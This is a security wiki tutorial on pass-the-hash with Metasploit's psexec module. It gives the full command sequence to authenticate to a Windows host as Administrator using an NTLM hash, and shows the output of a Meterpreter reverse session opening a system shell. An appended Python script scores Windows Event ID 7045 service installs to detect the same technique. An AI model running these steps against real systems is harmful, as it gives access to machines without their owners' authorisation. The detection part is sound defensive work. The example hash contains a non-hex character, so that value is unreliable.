Pass the Hash Using Metasploit (System Access Without a Password)

From the BGA Security Wiki

Aim:

Logging in to systems with the password hashes obtained from them, without cracking the hashes.

Tool:

  • Metasploit psexec

Steps:

Step 1: Start Metasploit:

root@bt:~/Desktop# msfconsole
msf >

Step 2: Search for the psexec module, the exploit that will be configured with the relevant parameters and run to connect to the target system:

msf > search psexec
Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/windows/smb/psexec     1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
   exploit/windows/smb/smb_relay  2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution

Step 3: Display the module's options and fill in the relevant fields according to the target system:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator

msf exploit(psexec) > set SMBPass c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302
SMBPass => c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302

Step 4: Attack the target system:

msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.2.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.2.5:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TDHsJbAQ.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (IGeUeVNy - "MsTfiq")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (752128 bytes) to RHOST 192.168.2.5
[*] Closing service handle...
[*] Deleting \TDHsJbAQ.exe...
[*] Meterpreter session 1 opened (RHOST 192.168.2.3:4444 -> RHOST 192.168.2.5:4122) at 2012-12-07 11:17:06 +0200 
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>
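The session output above shows what this technique leaves behind on the target: a randomly named executable is uploaded to the ADMIN$ share (which maps to %SystemRoot%), a service with a random name is created and started through the svcctl pipe, and both are removed again. The service installation is recorded by the Service Control Manager as Event ID 7045 in the System log even after the cleanup. The script below is an added defensive example, not part of the original wiki page or of Metasploit: it parses constructed 7045 messages (not real log exports) and scores them against that pattern. The scoring rules, the case-flip test for random names and the threshold of 4 are heuristics chosen here as assumptions, not a vendor signature.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample messages in the text format of Windows System log
# Event ID 7045 ("A service was installed in the system"). They are not real
# exports; the suspicious ones are modelled on the artifacts printed in the
# psexec session above: an 8-letter random service name and a random .exe
# placed directly in ADMIN$ / %SystemRoot%.
SAMPLE_EVENTS = [
    # Benign: descriptive name, stable path under Program Files, auto start.
    "A service was installed in the system.\n"
    "Service Name: BackupAgent\n"
    "Service File Name: \"C:\\Program Files\\Vendor\\BackupAgent\\agent.exe\"\n"
    "Service Type: user mode service\n"
    "Service Start Type: auto start\n"
    "Service Account: LocalSystem",
    # Suspicious: random name, random .exe directly in %SystemRoot%, demand start.
    "A service was installed in the system.\n"
    "Service Name: IGeUeVNy\n"
    "Service File Name: %SystemRoot%\\TDHsJbAQ.exe\n"
    "Service Type: user mode service\n"
    "Service Start Type: demand start\n"
    "Service Account: LocalSystem",
    # Suspicious: same pattern, binary referenced through the admin share.
    "A service was installed in the system.\n"
    "Service Name: qWzRtKpL\n"
    "Service File Name: \\\\127.0.0.1\\ADMIN$\\xKqmZrpt.exe\n"
    "Service Type: user mode service\n"
    "Service Start Type: demand start\n"
    "Service Account: LocalSystem",
]


@dataclass
class ServiceInstall:
    name: str
    file_name: str
    start_type: str
    account: str


FIELD_RE = {
    "name": re.compile(r"^Service Name:[ \t]*(.*?)[ \t]*$", re.M),
    "file_name": re.compile(r"^Service File Name:[ \t]*(.*?)[ \t]*$", re.M),
    "start_type": re.compile(r"^Service Start Type:[ \t]*(.*?)[ \t]*$", re.M),
    "account": re.compile(r"^Service Account:[ \t]*(.*?)[ \t]*$", re.M),
}

# Directories that are the root of ADMIN$: the module writes its payload there.
SHARE_ROOT_RE = re.compile(r"^(%SystemRoot%|C:\\Windows|\\\\[^\\]+\\ADMIN\$)$", re.I)


def parse_7045(message: str) -> ServiceInstall:
    """Extract the fields of one 7045 message (missing fields become '')."""
    found = {}
    for key, rx in FIELD_RE.items():
        m = rx.search(message)
        found[key] = m.group(1) if m else ""
    return ServiceInstall(**found)


def case_transitions(token: str) -> int:
    """Count upper/lower flips between neighbouring letters: random alpha
    strings such as IGeUeVNy flip often, real words and product names rarely."""
    letters = [c for c in token if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def looks_random(token: str) -> bool:
    # Heuristic (assumption): letters only, service-name length, >= 3 case flips.
    return token.isalpha() and 6 <= len(token) <= 16 and case_transitions(token) >= 3


def split_path(file_name: str) -> Tuple[str, str]:
    """Return (directory, file stem) of a service binary path, quotes removed."""
    path = file_name.strip().strip('"')
    directory, _, base = path.rpartition("\\")
    stem = base.rsplit(".", 1)[0]
    return directory, stem


def score_service(svc: ServiceInstall) -> Tuple[int, List[str]]:
    """Weighted heuristics; a higher score is closer to the psexec pattern."""
    score, reasons = 0, []
    directory, stem = split_path(svc.file_name)
    if looks_random(stem):
        score += 2
        reasons.append(f"random binary name {stem!r}")
    if SHARE_ROOT_RE.match(directory):
        score += 2
        reasons.append(f"binary placed in share root {directory!r}")
    if looks_random(svc.name):
        score += 1
        reasons.append(f"random service name {svc.name!r}")
    if svc.start_type.lower() == "demand start" and svc.account == "LocalSystem":
        score += 1
        reasons.append("demand-start service running as LocalSystem")
    return score, reasons


def find_suspicious(messages: List[str], threshold: int = 4) -> List[ServiceInstall]:
    """Return the service installs whose score reaches the threshold."""
    return [svc for svc in map(parse_7045, messages) if score_service(svc)[0] >= threshold]


if __name__ == "__main__":
    for svc in map(parse_7045, SAMPLE_EVENTS):
        score, reasons = score_service(svc)
        print(f"{svc.name:<12} score={score}  {'; '.join(reasons)}")
```

The binary-name and share-root rules carry the most weight because a legitimate installer almost never drops an eight-letter executable straight into the Windows directory and registers it as an on-demand service; the service name alone is a weak signal, since product names such as BackupAgent also mix case. In a real deployment the same scoring would run over 7045 events exported from the System log and be correlated with the network logon (type 3) that preceded the service creation.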

Starting with Windows 7, Windows by default prevents users other than the Administrator user from executing commands on the system in this way.